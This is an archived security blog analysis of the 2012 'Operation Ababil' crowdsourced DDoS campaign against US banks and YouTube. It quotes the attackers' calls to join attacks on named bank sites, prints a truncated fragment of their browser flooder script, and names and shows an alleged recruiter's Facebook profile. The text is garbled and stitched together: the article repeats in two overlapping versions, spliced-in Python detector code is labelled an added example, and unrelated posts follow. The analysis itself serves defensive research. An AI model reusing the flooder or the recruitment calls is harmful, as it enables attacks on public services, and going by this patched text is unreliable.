[Screenshot: Pastebin post "Operation Ababil: second step over chase.com" by QassamCyberFighters, Sep 19th, 2012, announcing that "Operation Ababil" started over BoA and that the second step targeted the "chase" bank, signed "Cyber fighters of Izz ad-din Al qassam"] 

The original message left is as follows: 

"Operation Ababil, The second week 
In the previous announcements we stated that we will not tolerate insulting exalted character of the prophet of mercy and kindness. Due to the insult, we planned and accomplished a series of cyber operations against the insulting country's credit and financial centers. Some U.S. officials tried to divert people's attention from the subject and claimed that the main aim of the operation was not deal to insults but it had other intentions. The officials claimed that certain countries have taken these measures to solve their internal problems. We strongly reject the American officials' insidious attempts to deceive public opinion. We declare that the kindness and love of Muslims and free-minded people of the world to the great prophet of Islam is much more than their violent anger be deflected and controlled by such deceptive tricks. Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad (Peace Be upon Him). 

So as we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet. Therefore, we suggest a Timetable for this week attacks. Knowing which times the banks and other targets are out of service, the customers of targeted sites also can manage to do their jobs as well and have a rest while the specific organization is under attack. We shall attack for 8 hours daily, starting at 2:30 PM GMT, every day. 

We repeat again the attacks will continue for sure till the removal of that sacrilegious movie. We invite all cyberspace workers to join us in this Proper Act. If America's arrogant government do not submit, the attack will be large and larger and will include other evil countries like Israel, French and U. Kingdom indeed. 
Tuesday 9/25/2012 : attack to Wells Fargo site, www.wellsfargo.com 
Wednesday 9/26/2012 : attack to U.S. Bank site, www.usbank.com 
Thursday 9/27/2012 : attack to PNC site, www.pnc.com 
Weekends: planning for the next week' attacks. 
Mrt. izz ad-Din al-Qassam Cyber Fighters" 

Periodically, the group also released update notes for the campaigns currently taking place: 

The original message published is as follows: 
[Screenshot: Pastebin post "Bank of America and New York Stock Exchange under attack unt..." by QassamCyberFighters, Sep 18th, 2012, addressed to "Muslim youths", announcing the attack on the Bank of America and New York Stock Exchange "for the first step", starting "today at 2 pm. GMT"] 


""Operation Ababil" started over BoA: 
http://pastebin.com/mCHia4WS 
http://pastebin.com/wMma9zyG 
In the second step we attacked the largest bank of the united states, the "chase" bank. These series of attacks will continue untill the Erasing of that nasty movie from the Internet. The site "www.chase.com" is down and also Online banking at "chaseonline.chase.com" is being decided to be Offline! Down with modern infidels. ### Cyber fighters of izz ad-din Al qassam ###" 

Second statement released by the group: 

The original message published is as follows: 

"Dear Muslim youths, Muslims Nations and are noblemen 
When Arab nations rose against their corrupt regimes (those who support Zionist regime) at the other hand when, Crucify infidels are terrified and they are no more supporting human rights. United States of America with the help of Zionist Regime made a Sacrilegious movie insulting all the religions not only Islam. All the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is necessary to stop spreading this movie. We will attack them for this insult with all we have. All the Muslim youths who are active in the Cyber world will attack to American and Zionist Web bases as much as needed such that they say that they are sorry about that insult. We, Cyber fighters of izz ad-din Al qassam will attack the Bank of America and New York Stock Exchange for the first step. These Targets are properties of American-Zionist Capitalists. This attack will be started today at 2 pm. GMT. This attack will continue till the Erasing of that nasty movie. Beware this attack can vary in type. Down with modern infidels." 

Clearly, the group behind the campaigns aimed to deliver concise propaganda to prospective Internet connected users who would later on be instructed on how to participate in the DDoS attacks. Let's assess the potential of the distributed DDoS tool that was used in the campaign. 

Sample screenshot of the DDoS script in Arabic: 


[Screenshot: the DDoS script as rendered in the browser, with a message in Arabic and English ("Muslims of the world ... By running this plan since 18 September at 5 pm (Mecca's Local Time, 1400 GMT) we will be united. We will continue our attacks against financial centers of the United States until removing these videos by administrators of the site"), the three targets www.BankOfAmerica.com, www.nasdaq.com and www.nyse.com, and a "Start Attack" button] 

[Screenshot: excerpt of the script's HTML/JavaScript source, showing hidden requested/succeeded/failed counters, a status label, a target URL input, a fire button and requests-per-second and timeout fields] 
Inside the .html file, we can see that there are only three web addresses that will be targeted in their campaign. 

Detection rate for the DDoS script: 

youtube.html - [8]MD5: C3fd7601b4aefe70e4a8f6d73bf5c997 

Detected by 6 out of 43 antivirus scanners as HTool-Loic; Hacktool.Generic; TROJ_GEN.F47V0924 

Originally, the attack relied on a static recruitment message which included links to the DIY DDoS script located on 4shared.com and Mediafire.com. What's particularly interesting is the fact that the files were uploaded by a user going under the handle of "Marzi Mahdavi II". It's important to point out that these static links were distributed as part of the recruitment campaign across multiple Muslim-friendly Facebook groups. 

[Screenshot: Facebook profile of "Marzi Mahdavi II", listing Tehran, Iran as the user's current and home town] 









Thanks to this fact, we could easily identify the user's Facebook account, and actually spot the original message seeking participation in the upcoming attacks. 

Marzi Mahdavi II's Facebook account: 

Sample shared Wall post seeking participation in the upcoming DDoS campaign: 
[Screenshot: Facebook Timeline post by Marzi Mahdavi II, written in Persian and ending with "Start Attack"] 
Sample blog post enticing users to participate: 
Just like Attack to YouTube site you can Download the Links and run the web page and simply hit the Start at the time of Attack. 



Marzi Mahdavi II has once referenced a link pointing to the same blog, clearly indicating that he's following the ongoing recruitment campaigns across multiple Web sites: 

Second blog post enticing users to participate in the DDoS campaign: 
According to YouTube administrator refusal to remove the prophet of Islam-insulting video, an internet group has developed a computer program - that is approved by Hilf-ol-Fozoul experts - to prevent the release of the video. 

When they run that program, YouTube will be impaired. 

For more influence of this action, it is necessary to run the program by a large number of users simultaneously. 

Tomorrow on 15 September at 4 pm. (Mecca Local Time) the action will begin. The considered file has been designed in html format. You can download it from links below: 

Link 1 



This latest example of the Iranian hacktivist community's understanding of cyber operations once again leads me to the conclusion that either Iran's hacktivist community is lagging years behind the sophisticated Eastern European hacking teams and cybercrime-friendly communities, or Iran is purposely demonstrating low cyber operation capabilities in an attempt to trick the Western world into thinking that it is still in "catch up mode" with the rest of the world when it comes to offensive cyber operations. 

Did these coordinated DDoS campaigns actually have any impact on the targeted web sites? According to data from Host-Tracker, they seem to have achieved limited, but visible results, a rather surprising fact given the low-profile DDoS script released by the campaigners. 










Sample Host-Tracker report for a targeted web site during the campaign: 
Second Host-Tracker report for a targeted web site during the campaign: 
[Screenshot: Host-Tracker check of http://www.wellsfargo.com on Tuesday, September 25, 2012: nearly every monitoring location reports "error Http_client.Bad_message("Unknown reason (e.g. unexpected eof, timeout)")"] 
Third Host-Tracker report for a targeted web site 
during the campaign: 
[Screenshot: Host-Tracker check of http://www.BankOfAmerica.com on Tuesday, September 18, 2012 6:14:47 PM, with 14 Ok and 32 Fail responses: most monitoring locations (New York, Jakarta, Orlando, Dallas, Kiev, Paris and others) report "error :Http_client.Bad_message("Unknown reason (e.g. unexpected eof, timeout)")", while the checks that did succeed took 40 to 80 seconds] 
Fourth Host-Tracker report for a targeted web site
during the campaign:

[Host-Tracker report screenshot, Saturday, September 15, 2012 8:02:50 PM, for http://www.youtube.com]
Received responses: 39 Ok, 8 Fail. Average: 0.88 sec, 183.18 KB/sec.

Location              Result          Page Size  Response time  KB/sec  IP              Partner
Atlanta, GA, US       Http error:303  0          0.09 sec               74.125.228.97   Phil-Hosting.com
Lansing, MI, US       Http error:303  0          0.07 sec               74.125.227.1    R loserver
Orlando, FL, US       Http error:303  0          0.06 sec               173.194.37.4    Apto Hosting
London, UK            Http error:303  0          0.05 sec               74.125.225.78   vrtpalSplits
Kansas City, MO, US   Http error:303  0          0.08 sec               74.125.225.68   Admo.net LLC
Frankfurt, Germany    Ok              167478     0.48 sec       343.63  173.194.70.190  mrhostbl 2
Dallas, TX, US        Http error:303  0          1.29 sec               74.125.227.105  Custom Hosting Solutions
Minsk, Belarus        Ok              158379     0.68 sec       227.44  173.194.32.36   BelInfoNet Ltd.
Los Angeles, CA, US   Http error:303  0          0.10 sec               173.194.33.2    PremiumReseller
Paris, France         Http error:303  0          0.11 sec               173.194.41.99   Cyber Snake Ltd
Dallas, TX, US        Ok              155239     0.44 sec       342.61  74.125.227.105  Custom Hosting Solutions
Washington, USA       Ok              160852     0.38 sec       413.41  74.125.228.66   Nidohosting
Montreal, Quebec, Ca  Ok              154494     2.43 sec       62.20   173.194.43.2    NordGate networks
Moscow, Russia        Ok              179298     0.67 sec       261.83  173.194.32.200  JustHost

Fifth Host-Tracker report for a targeted web site
during the campaign:

[Host-Tracker report screenshot, Thursday, September 27, 2012 5:09:35 PM, for http://www.pnc.com]
Received responses: 22 Ok, 14 Fail. Average: 5.32 sec, 0.02 KB/sec.
"Bad_message" below stands for error :Http_client.Bad_message("Unknown reason (e.g. unexpected eof, timeout)").

Location                Result       Page Size  Response time  KB/sec  IP
New York, NY, US        Bad_message             115.01 sec             170.201.60.3
Amsterdam, Netherlands  Bad_message             40.00 sec              170.201.60.3
Haarlem, Netherlands    Bad_message             40.00 sec              170.201.60.3
Minsk, Belarus          Bad_message             40.00 sec              170.201.60.3
Amsterdam, Netherlands  Bad_message             40.09 sec              170.201.60.3
Birmingham, UK          Bad_message             40.00 sec              170.201.60.3
Dallas, TX, US          Ok           254        21.12 sec      0.01    170.201.60.3
Toronto, ON, CA         Bad_message             40.00 sec              170.201.60.3

Partners listed in the report: POhost, BelInfoNet Ltd, Hostmaster Ltd, Joomla Hosting, Custom Hosting Solutions, OnyxNetUa.


1. http://www.zdnet.com/blog/security/attack-of-the-opt-in-botnets/6268

2. http://www.reuters.com/article/2012/09/21/us-iran-cyberattacks-idUSBRE88K12H20120921

3. http://www.zdnet.com/blog/security/coordinated-russia-vs-georgia-cyber-attack-in-progress/1670

4. http://www.zdnet.com/blog/security/iranian-opposition-launches-organized-cyber-attack-against-pro-ahmadinejad-sites/3613

5. http://ddanchev.blogspot.com/2007/11/electronic-jihad-v30-what-cyber-jihad.html

6. http://ddanchev.blogspot.com/2008/04/ddos-attack-against-cnncom.html

7. http://www.foxbusiness.com/industries/2012/09/24/lieberman-blame-iran-for-cyber-attacks-on-bank-america-chase/

8. https://www.virustotal.com/file/a3be8deb4ebc8de1d0d19467da606033c8938cf74d1489761fbc9e195d7d1c75/analysis/1348697936/

9. http://www.zdnet.com/blog/security/iranian-opposition-launches-organized-cyber-attack-against-pro-ahmadinejad-sites/3613

10. http://www.zdnet.com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194

11. http://ddanchev.blogspot.com/

12. http://twitter.com/danchodanchev
Operation Ababil, The second week

In the previous announcements we stated that we will not tolerate insulting exalted character of the prophet of mercy and kindness. Due to the insult, we planned and accomplished a series of cyber operations against the insulting country's credit and financial centers.

Some U.S. officials tried to divert people's attention from the subject and claimed that the main aim of the operation was not deal to insults but it had other intentions. The officials claimed that certain countries have taken these measures to solve their internal problems.

We strongly reject the American officials' insidious attempts to deceive public opinion. We declare that the kindness and love of Muslims and free-minded people of the world to the great prophet of Islam is much more than their violent anger be deflected and controlled by such deceptive tricks.

Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad (Peace Be upon Him). So as we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet.

Therefore, we suggest a Timetable for this week attacks. Knowing which times the banks and other targets are out of service, the customers of targeted sites also can manage to do their jobs as well and have a rest while the specific organization is under attack.

We shall attack for 8 hours daily, starting at 2:30 PM GMT, every day. We repeat again the attacks will continue for sure till the removal of that sacrilegious movie.

Dissecting 'Operation Ababil' - an OSINT Analysis
(2012-09-28 00:25)

Provoked by a questionable online video posted on YouTube, Muslims from around the world united in an apparent [1]opt-in botnet crowdsourcing campaign aiming to launch a DDoS (distributed denial of service) attack against YouTube for keeping the video online, and against several [2]major U.S. banks and financial institutions.

Dubbed "Operation Ababil", and operated by the Izz ad-Din al-Qassam a.k.a. Qassam Cyber Fighters, the campaign appears to have had a limited, but highly visible impact on the targeted web sites. Just like in every other crowdsourced opt-in botnet campaign, such as the "[3]Coordinated Russia vs Georgia cyber attack in progress", the "[4]Iranian opposition launches organized cyber attack against pro-Ahmadinejad sites", the "[5]Electronic Jihad v3.0 - What Cyber Jihad Isn't" campaign, and the "[6]The DDoS Attack Against CNN.com" campaign, political sentiments over the attribution element seem to have orbited around the notion that it was [7]nation-sponsored by the Iranian government.

What's so special about this attack? Did the individuals behind it possess sophisticated hacking or coding abilities? Was it the work of hacktivists crowdsourcing bandwidth, or was it actually sponsored by the Iranian government? Can we even talk about attack attribution given that the group claiming responsibility for the attacks doesn't have a strong digital fingerprint?

In this post, I'll perform an OSINT (open source intelligence) analysis aiming to expose one of the individuals who are part of the group that organized the campaign, spread their propaganda message to as many Muslim Facebook groups as possible, and actually claimed responsibility for the attacks once they took place.

The campaign originally began with a message left on Pastebin.com by the Qassam Cyber Fighters group announcing "Operation Ababil":
Operation Ababil: second step over chase.com

BY: QASSAMCYBERFIGHTERS ON SEP 19TH, 2012 | SYNTAX: NONE | SIZE: 0.47 KB | HITS: 2,874 | EXPIRES: NEVER

"Operation Ababil" started over BoA :

http://pastebin.com/mCHia4WS
http://pastebin.com/wMma9zyG

In the second step we attacked the largest bank of the united states, the "chase" bank. These series of attacks will continue until the Erasing of that nasty movie from the Internet.

The site "www.chase.com" is down and also Online banking at "chaseonline.chase.com" is being decided to be Offline !

Down with modern infidels.

### Cyber fighters of Izz ad-din Al qassam ###

The original message left is as follows:

"Operation Ababil, The second week. In the previous announcements we stated that we will not tolerate insulting exalted character of the prophet of mercy and kindness. Due to the insult, we planned and accomplished a series of cyber operations against the insulting country's credit and financial centers. Some U.S. officials tried to divert people's attention from the subject and claimed that the main aim of the operation was not deal to insults but it had other intentions. The officials claimed that certain countries have taken these measures to solve their internal problems. We strongly reject the American officials' insidious attempts to deceive public opinion. We declare that the kindness and love of Muslims and free-minded people of the world to the great prophet of Islam is much more than their violent anger be deflected and controlled by such deceptive tricks. Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad (Peace Be upon Him). So as we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet. Therefore, we suggest a Timetable for this week attacks. Knowing which times the banks and other targets are out of service, the customers of targeted sites also can manage to do their jobs as well and have a rest while the specific organization is under attack. We shall attack for 8 hours daily, starting at 2:30 PM GMT, every day. We repeat again the attacks will continue for sure till the removal of that sacrilegious movie. We invite all cyberspace workers to join us in this Proper Act. If America's arrogant government do not submit, the attack will be large and larger and will include other evil countries like Israel, French and U. Kingdom indeed. Tuesday 9/25/2012 : attack to Wells Fargo site, www.wellsfargo.com Wednesday 9/26/2012 : attack to U.S. Bank site, www.usbank.com Thursday 9/27/2012 : attack to PNC site, www.pnc.com Weekends: planning for the next week' attacks. Mrt. Izz ad-Din al-Qassam Cyber Fighters"

Periodically, the group also released update notes for the campaigns currently taking place:

The original message published is as follows:

Bank of America and New York Stock Exchange under attack unt

BY: QASSAMCYBERFIGHTERS ON SEP 18TH, 2012 | SYNTAX: NONE | SIZE: 1.08 KB | HITS: 7,579 | EXPIRES: NEVER

Dear Muslim youths, Muslims Nations and are noblemen

When Arab nations rose against their corrupt regimes (those who support Zionist regime) at the other hand when, Crucify infidels are terrified and they are no more supporting human rights. United States of America with the help of Zionist Regime made a Sacrilegious movie insulting all the religions not only Islam.

All the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is necessary to stop spreading this movie. We will attack them for this insult with all we have.

All the Muslim youths who are active in the Cyber world will attack to American and Zionist Web bases as much as needed such that they say that they are sorry about that insult.

We, Cyber fighters of Izz ad-din Al qassam will attack the Bank of America and New York Stock Exchange for the first step. These Targets are properties of American-Zionist Capitalists. This attack will be started today at 2 pm. GMT. This attack will continue till the Erasing of that nasty movie. Beware this attack can vary in type.

Down with modern infidels.


"Operation Ababil" started over BoA : http://pastebin.com/mCHia4WS http://pastebin.com/wMma9zyG In the second step we attacked the largest bank of the united states, the "chase" bank. These series of attacks will continue until the Erasing of that nasty movie from the Internet. The site "www.chase.com" is down and also Online banking at "chaseonline.chase.com" is being decided to be Offline ! Down with modern infidels. ### Cyber fighters of Izz ad-din Al qassam ###"

Second statement released by the group:

The original message published is as follows:

"Dear Muslim youths, Muslims Nations and are noblemen. When Arab nations rose against their corrupt regimes (those who support Zionist regime) at the other hand when, Crucify infidels are terrified and they are no more supporting human rights. United States of America with the help of Zionist Regime made a Sacrilegious movie insulting all the religions not only Islam. All the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is necessary to stop spreading this movie. We will attack them for this insult with all we have. All the Muslim youths who are active in the Cyber world will attack to American and Zionist Web bases as much as needed such that they say that they are sorry about that insult. We, Cyber fighters of Izz ad-din Al qassam will attack the Bank of America and New York Stock Exchange for the first step. These Targets are properties of American-Zionist Capitalists. This attack will be started today at 2 pm. GMT. This attack will continue till the Erasing of that nasty movie. Beware this attack can vary in type. Down with modern infidels."

Clearly, the group behind the campaigns aimed to deliver concise propaganda to prospective Internet-connected users who would later on be instructed on how to participate in the DDoS attacks. Let's assess the potential of the distributed DDoS tool that was used in the campaign.

Sample screenshot of the DDoS script in Arabic:
[Screenshot of the DDoS page. The Arabic text at the top is not legible in the scan; the English text below it reads:]

Muslims of the world
Publishing the [illegible] film on YouTube against the prophet of Islam has hurt every Muslim's feelings
By running this plan since 18 September at 5 pm (Mecca's Local Time, 1400 GMT) we will be united
We will continue our attacks against financial centers of the United States until removing these videos by administrators of the site

www.BankOfAmerica.com
www.nasdaq.com
www.nyse.com

[Start Attack]

[Source of the script page as visible in the screenshot: the hidden counters and the beginning of the script. The listing is cut off in the scan.]

    <div>
    <input type="hidden" id="message" value="">
    </div>

    <dl>
    <dd style="opacity: 0.5;display:none;" id="requestedctr"></dd>
    <dt style="opacity: 0.5;display:none;">&nbsp;</dt>
    <dd style="opacity: 0.5;display:none;" id="succeededctr">0</dd>
    <dt style="opacity: 0.5;display:none;">&nbsp;</dt>
    <dd style="opacity: 0.5;display:none;" id="failedctr">0</dd>
    </dl>
    <label id="statuss"></label>

    <script>
    var i=0;

    (function () {

    var fireinterval;
    var isFiring = false;

    var requestedctrNode = document.getElementById("requestedctr"),
    succeededctrNode = document.getElementById("succeededctr"),
    failedctrNode = document.getElementById("failedctr"),
    targetURLNode = document.getElementById("targetURL"),
    fireButton = document.getElementById("fireButton"),
    messageNode = document.getElementById("message"),
    rpsNode = document.getElementById("rps"),
    timeoutNode = document.getElementById("timeout"),
    statuss = document.getElementById("statuss");
    var targetURL = targetURLNode.value;
    targetURLNode.onchange = function () {
    [listing cut off in the screenshot]

Inside the .html file, we can see that there are only three web addresses that will be targeted in their campaign: www.BankOfAmerica.com, www.nasdaq.com and www.nyse.com.

Detection rate for the DDoS script:

youtube.html - [8]MD5: C3fd7601b4aefe70e4a8f6d73bf5c997

Detected by 6 out of 43 antivirus scanners as HTool-Loic; Hacktool.Generic; TROJ_GEN.F47V0924
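With only 6 of 43 scanners flagging the file, a structural check for the markup and script prologue visible in the screenshot is one way a defender can triage copies of the page. This is an added example, not code from the post, from the tool or from any AV vendor: the element ids and JavaScript names come from the screenshot, the weights and thresholds are my own assumption, and both sample documents are constructed (the positive one carries only the static markup and the prologue, no request loop).

```python
"""Static indicator check for the browser-based 'opt-in' flooder page.

Added example; not code from the post or the tool. Ids and identifiers are
taken from the screenshot; weights and thresholds are an assumption.
"""
import re
from html.parser import HTMLParser

COUNTER_IDS = {"requestedctr", "succeededctr", "failedctr"}
CONTROL_IDS = {"targetURL", "fireButton", "rps", "timeout", "message", "statuss"}
JS_TOKENS = ("fireinterval", "isFiring", "targetURLNode", "getElementById")
URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w.\-/]*)?")


class IdCollector(HTMLParser):
    """Collect element ids, which of them are display:none, and script text."""

    def __init__(self):
        super().__init__()
        self.ids, self.hidden_ids, self.scripts = set(), set(), []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        elem_id = attrs.get("id")
        if elem_id:
            self.ids.add(elem_id)
            style = (attrs.get("style") or "").replace(" ", "").lower()
            if "display:none" in style:
                self.hidden_ids.add(elem_id)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def score_html(html):
    """Return (verdict, score, evidence) for one HTML document."""
    parser = IdCollector()
    parser.feed(html)
    parser.close()
    js = "\n".join(parser.scripts)
    evidence = {
        "counters": sorted(COUNTER_IDS & parser.ids),
        "hidden_counters": sorted(COUNTER_IDS & parser.hidden_ids),
        "controls": sorted(CONTROL_IDS & parser.ids),
        "js_tokens": [t for t in JS_TOKENS if t in js],
        "urls": sorted(set(URL_RE.findall(html))),  # hard-coded targets, if any
    }
    # Hidden counters weigh most: they are the tool's request bookkeeping.
    score = (2 * len(evidence["counters"]) + len(evidence["hidden_counters"])
             + len(evidence["controls"]) + len(evidence["js_tokens"]))
    if score >= 8:
        verdict = "likely-flooder"
    elif score >= 4:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, score, evidence


# Constructed positive sample: static markup and prologue only, as in the screenshot.
FLOODER_SAMPLE = """<div><input type="hidden" id="message" value=""></div>
<dl>
<dd style="opacity: 0.5;display:none;" id="requestedctr">0</dd>
<dt style="opacity: 0.5;display:none;">&nbsp;</dt>
<dd style="opacity: 0.5;display:none;" id="succeededctr">0</dd>
<dt style="opacity: 0.5;display:none;">&nbsp;</dt>
<dd style="opacity: 0.5;display:none;" id="failedctr">0</dd>
</dl>
<label id="statuss"></label>
<input id="targetURL" value="http://www.example.com">
<input id="rps" value="0"><input id="timeout" value="0">
<button id="fireButton">Start Attack</button>
<script>
var i=0;
(function () {
  var fireinterval;
  var isFiring = false;
  var targetURLNode = document.getElementById("targetURL");
  /* request loop deliberately absent from this sample */
})();
</script>"""

# Constructed benign sample: a counter and a script, but none of the markers.
BENIGN_SAMPLE = """<p id="visitorctr">0</p>
<script>document.getElementById("visitorctr").textContent = "1";</script>"""

if __name__ == "__main__":
    for name, doc in (("flooder", FLOODER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        verdict, score, evidence = score_html(doc)
        print(name, verdict, score, evidence)
```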

Originally, the attack relied on a static recruitment message which included links to the DIY DDoS script located on 4shared.com and Mediafire.com. What's particularly interesting is the fact that the files were uploaded by a user going under the handle of "Marzi Mahdavi II". It's important to point out that these static links were distributed as part of the recruitment campaign across multiple Muslim-friendly Facebook groups.
Thanks to this fact, we could easily identify the user's Facebook account, and actually spot the original message seeking participation in the upcoming attacks.

Marzi Mahdavi II's Facebook account:

[Facebook profile screenshot: Marzi Mahdavi II; lives in Tehran, Iran; from Tehran, Iran]

Sample shared Wall post seeking participation in the upcoming DDoS campaign:
[Screenshot of a Persian-language Timeline post by Marzi Mahdavi II; the text is not legible in the scan apart from the closing words "Start Attack"]
Sample blog post enticing users to participate:

Just like Attack to YouTube site you can Download the Links and run the web page and simply hit the Start at the time of Attack.

Marzi Mahdavi II has once referenced a link pointing to the same blog, clearly indicating that he's following the ongoing recruitment campaigns across multiple Web sites:

Second blog post enticing users to participate in the DDoS campaign:

According to YouTube administrator refusal to remove the prophet of Islam-insulting video, an internet group has developed a computer program - that is approved by Hilf-ol-Fozoul experts - to prevent the release of the video.

When they run that program, YouTube will be impaired.

For more influence of this action, it is necessary to run the program by a large number of users simultaneously.

Tomorrow on 15 September at 4 pm. (Mecca Local Time) the action will begin. The considered file has been designed in html format. You can download it from links below:

Link 1



This very latest example of the Iranian hacktivist community's understanding of cyber operations once again leads me to the conclusion that what we've got here is either the fact that Iran's hacktivist community is lagging years behind sophisticated Eastern European hacking teams and cybercrime-friendly communities, or that Iran is purposely demonstrating low cyber operation capabilities in an attempt to trick the Western world into thinking that it's still in a "catch up mode" with the rest of the world when it comes to offensive cyber operations.

Did these coordinated DDoS campaigns actually have any impact on the targeted web sites? According to data from Host-Tracker, they seem to have achieved limited, but visible results, a rather surprising fact given the low-profile DDoS script released by the campaigners.
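The Host-Tracker counters mix two different failures: an HTTP 303 (the server answered with a redirect, which Host-Tracker still counts as "Fail") and Http_client.Bad_message after a 40 to 115 second wait (no usable response at all). This added example, not code from the post or from Host-Tracker, separates the two over rows constructed from values visible in the screenshots; the pipe-separated row layout (Location | Result | Response time | IP) is my own simplification of the report columns.

```python
"""Interpret multi-vantage-point availability checks such as the Host-Tracker
reports reproduced in this post.

Added example; not code from the post or from Host-Tracker. Row layout is a
constructed simplification; rows use values visible in the screenshots.
"""
import re
from collections import Counter

BAD_MESSAGE = re.compile(r"Bad_message", re.IGNORECASE)
HTTP_ERROR = re.compile(r"Http error:?\s*(\d{3})", re.IGNORECASE)

ERR = 'error :Http_client.Bad_message("Unknown reason (e.g. unexpected eof, timeout)")'

# Constructed sample rows (values taken from the screenshots in the post).
SAMPLE_REPORTS = {
    "http://www.youtube.com (Sat, Sep 15, 2012)": [
        "Atlanta, GA, US | Http error:303 | 0.09 sec | 74.125.228.97",
        "Lansing, MI, US | Http error:303 | 0.07 sec | 74.125.227.1",
        "Frankfurt, Germany | Ok | 0.48 sec | 173.194.70.190",
        "Minsk, Belarus | Ok | 0.68 sec | 173.194.32.36",
        "Dallas, TX, US | Http error:303 | 1.29 sec | 74.125.227.105",
    ],
    "http://www.pnc.com (Thu, Sep 27, 2012)": [
        "New York, NY, US | " + ERR + " | 115.01 sec | 170.201.60.3",
        "Amsterdam, Netherlands | " + ERR + " | 40.00 sec | 170.201.60.3",
        "Haarlem, Netherlands | " + ERR + " | 40.00 sec | 170.201.60.3",
        "Dallas, TX, US | Ok | 21.12 sec | 170.201.60.3",
        "Toronto, ON, CA | " + ERR + " | 40.00 sec | 170.201.60.3",
    ],
}


def classify(result):
    """Map a Result cell to: ok, redirect, http_error, unreachable or unknown."""
    text = result.strip()
    if text.lower() == "ok":
        return "ok"
    if BAD_MESSAGE.search(text):
        return "unreachable"  # eof/timeout: nothing parseable came back
    m = HTTP_ERROR.search(text)
    if m:
        return "redirect" if 300 <= int(m.group(1)) < 400 else "http_error"
    return "unknown"


def parse_row(line):
    """Split one constructed row into its fields."""
    location, result, rtime, ip = (p.strip() for p in line.split("|"))
    return {"location": location, "result": result,
            "seconds": float(rtime.split()[0]), "ip": ip}


def _median(values):
    values = sorted(values)
    return values[len(values) // 2] if values else None


def summarize(target, lines):
    """Per-target view that separates 'answered' from 'timed out'."""
    rows = [parse_row(line) for line in lines]
    for row in rows:
        row["outcome"] = classify(row["result"])
    outcomes = Counter(row["outcome"] for row in rows)
    total = len(rows)
    answered = total - outcomes["unreachable"] - outcomes["unknown"]
    return {
        "target": target,
        "nodes": total,
        "outcomes": dict(outcomes),
        # What Host-Tracker's Ok/Fail counter would report.
        "ok_ratio": round(outcomes["ok"] / total, 2) if total else 0.0,
        # Share of vantage points that received any HTTP answer at all.
        "answered_ratio": round(answered / total, 2) if total else 0.0,
        "median_ok_seconds": _median(r["seconds"] for r in rows if r["outcome"] == "ok"),
        "median_unreachable_seconds": _median(
            r["seconds"] for r in rows if r["outcome"] == "unreachable"),
        # Every node hitting one address: a single front end took the whole load.
        "single_ip": len({r["ip"] for r in rows}) == 1,
    }


def summarize_all(reports=SAMPLE_REPORTS):
    return {target: summarize(target, lines) for target, lines in reports.items()}


if __name__ == "__main__":
    for target, view in summarize_all().items():
        print(target)
        for key, value in view.items():
            if key != "target":
                print(f"  {key}: {value}")
```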










Sample Host-Tracker report for a targeted web site
during the campaign:

[Host-Tracker report screenshot for http://www.usbank.com; the rest of the report is not legible in the scan]
Second Host-Tracker report for a targeted web site
during the campaign:

[Host-Tracker report screenshot for http://www.wellsfargo.com; the listed nodes returned error :Http_client.Bad_message("Unknown reason (e.g. unexpected eof, timeout)")]
Third Host-Tracker report for a targeted web site
during the campaign:

[Host-Tracker report screenshot, Tuesday, September 18, 2012 6:14:47 PM, for http://www.BankOfAmerica.com: 14 Ok, 32 Fail, average 16.30 sec; nodes in New York, Orlando, Dallas, Kiev, Birmingham and Paris, among others, returned error :Http_client.Bad_message("Unknown reason (e.g. unexpected eof, timeout)") after 40.00 to 115.01 sec]

Fourth Host-Tracker report for a targeted web site
during the campaign:

[Host-Tracker report screenshot, Saturday, September 15, 2012 8:02:50 PM, for http://www.youtube.com: 39 Ok, 8 Fail, average 0.88 sec; the failures are Http error:303 responses]

Fifth Host-Tracker report for a targeted web site
during the campaign:

[Host-Tracker report screenshot, Thursday, September 27, 2012 5:09:35 PM, for http://www.pnc.com: 22 Ok, 14 Fail, average 5.32 sec; the listed nodes returned error :Http_client.Bad_message("Unknown reason (e.g. unexpected eof, timeout)") after about 40 sec, with one Ok from Dallas, TX, US after 21.12 sec, all resolving to 170.201.60.3]


Is the Iranian government really behind this campaign, or was it actually the work of amateurs with outdated and virtually irrelevant technical skills? Taking into consideration the previous [9]DDoS campaign launched by Iranian hacktivists in 2009, in this very latest one we once again see a rather limited understanding of cyber operations, taking into consideration the centralized nature of the chain of command in this group.

What's also worth pointing out is the fact that this is the first public appearance of the group that claims responsibility for these attacks. Considering this and the lack of a strong digital fingerprint for the group in question, virtually anyone on the Internet can [10]engineer cyber warfare tensions between Iran and the U.S. by basically impersonating what's believed to be an Iranian group.

This post has been reproduced from [11]Dancho Danchev's blog. Follow him [12]on Twitter.
Summarizing ZDNet's Zero Day Posts for August
(2012-09-28 01:43)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for August, 2012. You can subscribe to [2]Zero Day's main feed, or follow me on Twitter:

01. [3]BlackBerry users targeted with malware-serving email campaign

02. [4]Java zero day vulnerability actively used in targeted attacks

03. [5]Loozfon Android malware targets Japanese female users

04. [6]Researcher reports a CSRF vulnerability in Facebook's App Center, earns $5,000

05. [7]Cybercriminals impersonate popular security vendors, serve malware

This post has been reproduced from [8]Dancho Danchev's blog. Follow him [9]on Twitter.
From Russia with iPhone selling affiliate networks

September 27, 2012 - 12:00 am

By Dancho Danchev

With affiliate networks continuing to represent among the few key growth factors of the cybercrime ecosystem, it shouldn't be surprising that cybercriminals continue introducing new services and goods with questionable quality and sometimes unknown origins on the market, with the idea to entice potential network participants into monetizing the traffic they can deliver through black hat SEO (Search Engine Optimization), malvertising, and spam campaigns.

